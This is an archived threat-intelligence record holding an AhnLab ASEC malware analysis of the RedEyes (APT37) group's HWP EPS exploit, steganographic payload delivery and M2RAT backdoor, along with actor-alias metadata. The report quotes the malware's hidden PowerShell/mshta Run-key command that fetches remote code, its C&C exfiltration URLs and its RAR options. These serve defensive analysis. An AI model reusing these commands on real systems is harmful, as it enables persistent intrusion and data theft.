{
	"id": "3aaa7873-8310-4ed5-adf8-fcd6d4a1822e",
	"created_at": "2026-04-06T00:15:56.210502Z",
	"updated_at": "2026-04-10T03:38:06.667332Z",
	"deleted_at": null,
	"sha1_hash": "5c7412f41750686d04fcdc582d97efff5b043a5b",
	"title": "HWP Malware Using the Steganography Technique: RedEyes (ScarCruft) - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1797861,
	"plain_text": "HWP Malware Using the Steganography Technique: RedEyes (ScarCruft) - ASEC\r\nBy ATCP\r\nPublished: 2023-02-13 · Archived: 2026-04-05 14:42:55 UTC\r\nIn January, the ASEC (AhnLab Security Emergency response Center) analysis team discovered that the RedEyes threat group (also known as APT37, ScarCruft) had been distributing malware by exploiting the HWP EPS (Encapsulated PostScript) vulnerability (CVE-2017-8291). This report shares the RedEyes group’s latest activity in Korea.\r\n1. Overview\r\nThe RedEyes group is known for targeting specific individuals rather than corporations, stealing not only personal PC information but also the mobile phone data of their targets. A distinct characteristic of the latest RedEyes group attack is that they exploited the HWP EPS vulnerability and used the steganography technique to distribute their malware.\r\nThe HWP EPS vulnerability used in the attacks is an old vulnerability that has already been patched in the latest version of the Hangul Word Processor. We assume that the threat actor initiated their attacks after checking in advance whether their targets (individuals) were using an older version of HWP that supports EPS. Furthermore, there is a confirmed past case where the RedEyes group used the steganography technique to distribute malware. In 2019, Kaspersky shared a report saying that the ScarCruft (RedEyes) group’s downloader used the steganography technique to download additional malware.\r\nThe usage of the steganography technique to download malware, and the Run key command for autorun registration used to establish a persistent connection with the C\u0026C server, are similar to the format used by the RedEyes group in the past; these are the reasons why we attribute this attack to them.\r\nThe RedEyes group is also known for using PowerShell and the Chinotto malware to steal PC information and remotely control systems. However, a new malware strain was found in the latest attack which, unlike Chinotto, uses a shared memory section to carry out C\u0026C commands.\r\nRegarding the newly identified malware, the ASEC analysis team named it M2RAT (Map2RAT) after the name found in the shared memory section.\r\nhttps://asec.ahnlab.com/en/48063/\r\nPage 1 of 14\r\nThis report covers the TTPs (Tactics, Techniques, and Procedures) of the RedEyes group’s initial access, defense evasion, and persistence, and the newly identified M2RAT’s latest command and control and exfiltration.\r\n2. Analysis\r\n2.1. Initial Access\r\nOn January 13, an HWP EPS vulnerability (CVE-2017-8291) attack involving the usage of the filename “Form.hwp” was discovered by AhnLab’s ASD (AhnLab Smart Defense). The HWP document was not collected at the time of the analysis, but we were able to procure the EPS file that triggered the aforementioned vulnerability.\r\nEPS is a graphic format that uses the PostScript programming language by Adobe to describe graphics. High-resolution vector images can be shown through EPS, and the Hangul Word Processor supported a third-party module (ghostscript) to process EPS files. However, due to an increase in malicious EPS vulnerability exploitations, such as APT attacks, Hancom has removed the third-party EPS processing module.\r\nAdditionally, the ASEC analysis team posted a detailed analysis report on the CVE-2017-8291 vulnerability back in 2019.\r\nThe “Form.hwp” file includes a vulnerable EPS file (CVE-2017-8291), which is shown in Figure 4. When the user opens the file (“Form.hwp”), the vulnerability allows the threat actor’s shellcode to run through the third-party module. The shellcode downloads an image file (JPEG) from the threat actor’s server (C\u0026C) and decrypts the encoded PE file contained within the image file. Afterward, it creates the PE file in the %temp% path before executing it.\r\n2.2. Defense Evasion\r\nThe shellcode downloaded an image file from the threat actor’s server and executed an additional piece of malware. In other words, the threat actor used the steganography technique to embed a malware strain within an image. We assume that this was done to evade network detection. It appears that the steganography image file used by the threat actor was obtained from a wallpaper-sharing website called “wallup.net”.\r\nThe image file consists of a normal JPEG header, the metadata required for decoding the PE file (XOR key and file size), and the encoded PE file.\r\nA 16-byte XOR key is used for PE decoding, XORing 1 byte at a time.\r\n16-byte XOR key: FD DD 28 F5 7C 48 8E 7E 0C E0 17 77 35 87 3B 49\r\n(0xFD xor 0xB0) = 0x4D (M)\r\n(0xDD xor 0x87) = 0x5A (Z)\r\n(0x28 xor 0xB8) = 0x90\r\n(0xF5 xor 0xF5) = 0x00\r\n(* MZ is the signature of the PE file.)\r\nThe ultimately decoded PE file is created and executed under the name lskdjfel.exe in the %temp% path. The executed PE file is responsible for downloading an additional backdoor malware (M2RAT), injecting it into explorer.exe, and adding both PowerShell and mshta commands to the autorun registry Run key to establish a persistent connection with the threat actor’s server.\r\n2.3. Persistence\r\nThe executed lskdjfel.exe file registers the following command to the registry Run key to establish a persistent connection with the threat actor’s server.\r\nRegistry key path: HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nValue name: RyPO\r\nValue: c:\\windows\\system32\\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 340328 2.2.2.2 || mshta hxxps://www.*****elearning.or[.]kr/popup/handle/1.html\r\nThe command registered to the registry Run key was found to be similar to that in the ScarCruft (RedEyes) group report published by Kaspersky in 2021.\r\n[ScarCruft’s registry Run key command in 2021 (by Kaspersky)]\r\nc:\\windows\\system32\\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 300000 2.2.2.2 || mshta hxxp://[redacted].cafe24[.]com/bbs/probook/1.html\r\n[RedEyes (ScarCruft) registry Run key command in 2023]\r\nc:\\windows\\system32\\cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 340328 2.2.2.2 || mshta hxxps://www.*******elearning.or[.]kr/popup/handle/1.html\r\nWhenever the affected host PC is booted up, the registry key causes PowerShell and the normal Windows utility mshta to also be executed. At the time of analysis, an HTA (HTML Application) file containing JS (JavaScript) code was collected from the “1.html” file that mshta had downloaded from the threat actor’s server.\r\nThe JS code is responsible for executing the PowerShell command, which receives and executes commands from the threat actor’s server and returns the results.\r\nWhen PowerShell appends a “U” parameter to the threat actor’s server address to transmit the computer name and username, the threat actor’s server encodes the CMD command that is going to be executed in BASE64 before sending it to the affected host. The encoded BASE64 command is then decoded by PowerShell and executed. The result of the command is saved as a file in the %temp%\\vnGhazwFiPgQ path. Afterward, an “R” parameter is appended to the threat actor’s server address, and the command execution result is sent encoded in BASE64.\r\nhxxps://www.*******elearning.or[.]kr/popup/handle/log.php?U=[Computer Name]+[Username] // Receive the threat actor’s command\r\nhxxps://www.*******elearning.or[.]kr/popup/handle/log.php?R=[BASE64-encoded] // Send command execution result\r\n2.4. M2RAT (Map2RAT)\r\nThe ultimately executed backdoor operates after being injected into explorer.exe. The main features of this backdoor are similar to those of basic remote control malware, which include keylogging, data leakage (files and recordings), running or terminating processes, and capturing screenshots.\r\nHowever, the recently discovered backdoor has a different command system compared to the previously identified Chinotto malware. It does not save the keylogging data or screenshot logs in the affected system but instead sends them to the threat actor’s server, leaving no traces of the stolen data in the affected system.\r\nThe ASEC analysis team named this newly identified malware M2RAT (Map2RAT) after the common name within the shared memory sections used during C\u0026C communication.\r\nFileInputMap2\r\nProcessInputMap2\r\nCaptureInputMap2\r\nRawInputMap2\r\nRegistryModuleInputMap2\r\nTypingRecordInputMap2\r\nUsbCheckingInputMap2\r\n2.4.1. Command and Control of M2RAT\r\nM2RAT’s C\u0026C command system involves receiving commands from the threat actor’s server through the Body of a POST request. The meaning of these commands can be found in Table 1 below.\r\nC\u0026C Command | Description\r\nOKR | Command received upon initial connection with C\u0026C communications\r\nURL | Edits the registry key value to update the C\u0026C\r\nUPD | Updates the currently connected C\u0026C\r\nRES | Ends C\u0026C connection (End M2RAT)\r\nUNI | Ends C\u0026C connection (End M2RAT)\r\nCMD | Performs remote control commands (Keylogging and process creation/execution)\r\nTable 1. Description of threat actor’s commands\r\nM2RAT’s threat actor server manages hosts by MAC address in order to distinguish affected hosts. When infected with M2RAT, the MAC address is encoded (XOR) with 0x5c and saved in the “Version” value of the “HKCU\\Software\\OneDriver” path. The encoded MAC address value is used to distinguish affected hosts in the threat actor’s server.\r\nRegistry key path: HKCU\\Software\\OneDriver\r\nValue name: Version\r\nValue: XOR-encoded (0x5c) MAC address of the affected host\r\nThe result value of the command sent by the threat actor to the affected host is saved in the “_Encoded MAC Address Value_2” folder of the threat actor’s server. The screenshots taken by M2RAT from the affected host are saved in the “_Encoded MAC Address Value_cap” folder. (Refer to Figure 12)\r\nAdditionally, M2RAT XOR-encodes the threat actor’s server address info with 0x5c and saves it in the “Property” value of the same registry key path as the MAC address.\r\nRegistry key path: HKCU\\Software\\OneDriver\r\nValue name: Property\r\nValue: XOR-encoded (0x5c) threat actor’s server address\r\nIn the future, the threat actor can transmit the “URL” and “UPD” commands to M2RAT to update their server address (Refer to Table 1). The “URL” command is used to update the registry key with a new address, and the “UPD” command is used to change the threat actor’s address defined in the currently running instance of M2RAT.\r\nThe remote control of M2RAT is carried out by transmitting CMD commands from the threat actor’s server. The Chinotto malware, which was confirmed to have been used by the RedEyes group in the past, executed remote control commands through the Query String method, but M2RAT creates a shared memory section to execute the commands from the threat actor’s server. Like the threat actor’s use of the steganography technique in the initial breach stage, this appears to also be for the purpose of evading network detection by hiding the command info in the Body of the POST.\r\n(* Query String: A string that starts with a question mark at the end of a URL)\r\nThe CMD command is transmitted through the shared memory. The memory section name info is shown below in Table 2.\r\nSection Name | Feature\r\nRegistryModuleInputMap2 | Transmits additional module execution results (e.g. mobile phone data leak module)\r\nFileInputMap2 | Explores drives (A:\\ – Z:\\), creates/writes files, and changes file times\r\nCaptureInputMap2 | Screenshots the current screen of the affected host’s PC\r\nProcessInputMap2 | Checks the process list, creates/terminates processes\r\nRawInputMap2 | Uses the ShellExecuteExW API to run processes\r\nTypingRecordInputMap2 | Leaks keylogging data\r\nUsbCheckingInputMap2 | USB data leak (hwp, doc, docx, xls, xlsx, ppt, pptx, cell, csv, show, hsdt, mp3, amr, 3gp, m4a, txt, png, jpg, jpeg, gif, pdf, eml)\r\nTable 2. Features of the shared memory section\r\n2.4.2. Exfiltration\r\nM2RAT’s exfiltration features include screenshots of the affected host’s screen, process information, keylogging information, and data (documents and voice files) leaks. In the case of screenshots, they are taken regularly even if a command is not given by the threat actor. They are then sent to the threat actor’s server where they are saved as “result_[number]” in the “_Encoded MAC Address Value_cap” folder.\r\nThe remaining data leaks are saved in the “_Encoded MAC Address Value_2” folder.\r\nIf there are documents or voice recordings with sensitive data in removable storage devices or shared folders, then these are copied into the %TEMP% path, compressed into a password-protected file with WinRAR (RAR.exe), and the results are then transmitted to the threat actor’s server.\r\nFolder path where data is copied to: %Temp%\\Y_%m_%d_%H_%M_%S // (e.g. %TEMP%\\Year_Month_Date_Hour_Minute_Second)\r\nFile extensions: hwp, doc, docx, xls, xlsx, ppt, pptx, cell, csv, show, hsdt, mp3, amr, 3gp, m4a, txt, png, jpg, jpeg, gif, pdf, eml\r\nThe RAR.exe options that are used are as follows. The path the compressed file is created in is the same as the %TEMP% folder path.\r\na -df -r -hp dgefiue389d@39r#1Ud -m1 “Compressed file creation path” “Compression target path”\r\nOption Name | Description\r\na | Compress\r\ndf | Delete file after compression\r\nr | Recover compressed file\r\nhp | Encrypt file data and header\r\nm | Set compression level\r\nTable 3. Explanation of RAR compression options\r\nThe ASEC analysis team was also able to uncover, through the ASD (AhnLab Smart Defense) infrastructure, an Infostealer communicating with M2RAT. This malware was identified as a .NET file that steals files saved on mobile phones and sends them to the RegistryModuleResultMap2 shared memory section of M2RAT.\r\nThe .NET file’s PDB info is as follows.\r\nPDB: E:\\MyWork\\PhoneDataCp\\PhoneDeviceManager\\PhoneDeviceManager\\obj\\x86\\Release\\PhoneDeviceManager.pdb\r\n3. Conclusion\r\nThe RedEyes group is an APT hacking organization that is supported at a national level. They are known to attack individual targets such as human rights activists, reporters, and North Korean defectors. Their aim appears to be exfiltration. Defending against such APT attacks is an extremely complicated process, especially since the RedEyes group is known to target individuals instead of corporations. It is difficult for individuals to even realize they have been affected. The ASEC analysis team is closely tracking this group. Should new TTPs be found from this threat actor, we will quickly share the details as we did in this blog post to contribute towards minimizing damage.\r\n4. References\r\nscarcruft-surveilling-north-korean-defectors-and-human-rights-activists – Kaspersky\r\nTTPs #9: Analysis of Attack Strategies that Monitor Daily Lives of Individuals – KrCert/CC\r\nTTPs $ ScarCruft Tracking Note – KrCert/CC\r\n“Ghost” Hidden In HWP Files (This report supports Korean only for now.) – ASEC Analysis Team\r\nMD5\r\n4488c709970833b5043c0b0ea2ec9fa9\r\n7bab405fbc6af65680443ae95c30595d\r\n7f5a72be826ea2fe5f11a16da0178e54\r\n8b666fc04af6de45c804d973583c76e0\r\n9083c1ff01ad8fabbcd8af1b63b77e66\r\nAdditional IOCs are available on AhnLab TIP.\r\nSource: https://asec.ahnlab.com/en/48063/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://asec.ahnlab.com/en/48063/"
	],
	"report_names": [
		"48063"
	],
	"threat_actors": [
		{
			"id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e",
			"created_at": "2025-08-07T02:03:25.082908Z",
			"updated_at": "2026-04-10T02:00:03.744649Z",
			"deleted_at": null,
			"main_name": "NICKEL FOXCROFT",
			"aliases": [
				"APT37 ",
				"ATK4 ",
				"Group 123 ",
				"InkySquid ",
				"Moldy Pisces ",
				"Operation Daybreak ",
				"Operaton Erebus ",
				"RICOCHET CHOLLIMA ",
				"Reaper ",
				"ScarCruft ",
				"TA-RedAnt ",
				"Venus 121 "
			],
			"source_name": "Secureworks:NICKEL FOXCROFT",
			"tools": [
				"Bluelight",
				"Chinotto",
				"GOLDBACKDOOR",
				"KevDroid",
				"KoSpy",
				"PoorWeb",
				"ROKRAT",
				"final1stpy"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "bbe36874-34b7-4bfb-b38b-84a00b07042e",
			"created_at": "2022-10-25T15:50:23.375277Z",
			"updated_at": "2026-04-10T02:00:05.327922Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"APT37",
				"InkySquid",
				"ScarCruft",
				"Group123",
				"TEMP.Reaper",
				"Ricochet Chollima"
			],
			"source_name": "MITRE:APT37",
			"tools": [
				"BLUELIGHT",
				"CORALDECK",
				"KARAE",
				"SLOWDRIFT",
				"ROKRAT",
				"SHUTTERSPEED",
				"POORAIM",
				"HAPPYWORK",
				"Final1stspy",
				"Cobalt Strike",
				"NavRAT",
				"DOGCALL",
				"WINERACK"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "552ff939-52c3-421b-b6c9-749cbc21a794",
			"created_at": "2023-01-06T13:46:38.742547Z",
			"updated_at": "2026-04-10T02:00:03.08515Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"Operation Daybreak",
				"Red Eyes",
				"ScarCruft",
				"G0067",
				"Group123",
				"Reaper Group",
				"Ricochet Chollima",
				"ATK4",
				"APT 37",
				"Operation Erebus",
				"Moldy Pisces",
				"APT-C-28",
				"Group 123",
				"InkySquid",
				"Venus 121"
			],
			"source_name": "MISPGALAXY:APT37",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9b02c527-5077-489e-9a80-5d88947fddab",
			"created_at": "2022-10-25T16:07:24.103499Z",
			"updated_at": "2026-04-10T02:00:04.867181Z",
			"deleted_at": null,
			"main_name": "Reaper",
			"aliases": [
				"APT 37",
				"ATK 4",
				"Cerium",
				"Crooked Pisces",
				"G0067",
				"Geumseong121",
				"Group 123",
				"ITG10",
				"InkySquid",
				"Moldy Pisces",
				"Opal Sleet",
				"Operation Are You Happy?",
				"Operation Battle Cruiser",
				"Operation Black Banner",
				"Operation Daybreak",
				"Operation Dragon messenger",
				"Operation Erebus",
				"Operation Evil New Year",
				"Operation Evil New Year 2018",
				"Operation Fractured Block",
				"Operation Fractured Statue",
				"Operation FreeMilk",
				"Operation Golden Bird",
				"Operation Golden Time",
				"Operation High Expert",
				"Operation Holiday Wiper",
				"Operation Korean Sword",
				"Operation North Korean Human Right",
				"Operation Onezero",
				"Operation Rocket Man",
				"Operation SHROUDED#SLEEP",
				"Operation STARK#MULE",
				"Operation STIFF#BIZON",
				"Operation Spy Cloud",
				"Operation Star Cruiser",
				"Operation ToyBox Story",
				"Osmium",
				"Red Eyes",
				"Ricochet Chollima",
				"Ruby Sleet",
				"ScarCruft",
				"TA-RedAnt",
				"TEMP.Reaper",
				"Venus 121"
			],
			"source_name": "ETDA:Reaper",
			"tools": [
				"Agentemis",
				"BLUELIGHT",
				"Backdoor.APT.POORAIM",
				"CARROTBALL",
				"CARROTBAT",
				"CORALDECK",
				"Cobalt Strike",
				"CobaltStrike",
				"DOGCALL",
				"Erebus",
				"Exploit.APT.RICECURRY",
				"Final1stSpy",
				"Freenki Loader",
				"GELCAPSULE",
				"GOLDBACKDOOR",
				"GreezeBackdoor",
				"HAPPYWORK",
				"JinhoSpy",
				"KARAE",
				"KevDroid",
				"Konni",
				"MILKDROP",
				"N1stAgent",
				"NavRAT",
				"Nokki",
				"Oceansalt",
				"POORAIM",
				"PoohMilk",
				"PoohMilk Loader",
				"RICECURRY",
				"RUHAPPY",
				"RokRAT",
				"SHUTTERSPEED",
				"SLOWDRIFT",
				"SOUNDWAVE",
				"SYSCON",
				"Sanny",
				"ScarCruft",
				"StarCruft",
				"Syscon",
				"VeilShell",
				"WINERACK",
				"ZUMKONG",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434556,
	"ts_updated_at": 1775792286,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5c7412f41750686d04fcdc582d97efff5b043a5b.pdf",
		"text": "https://archive.orkl.eu/5c7412f41750686d04fcdc582d97efff5b043a5b.txt",
		"img": "https://archive.orkl.eu/5c7412f41750686d04fcdc582d97efff5b043a5b.jpg"
	}
}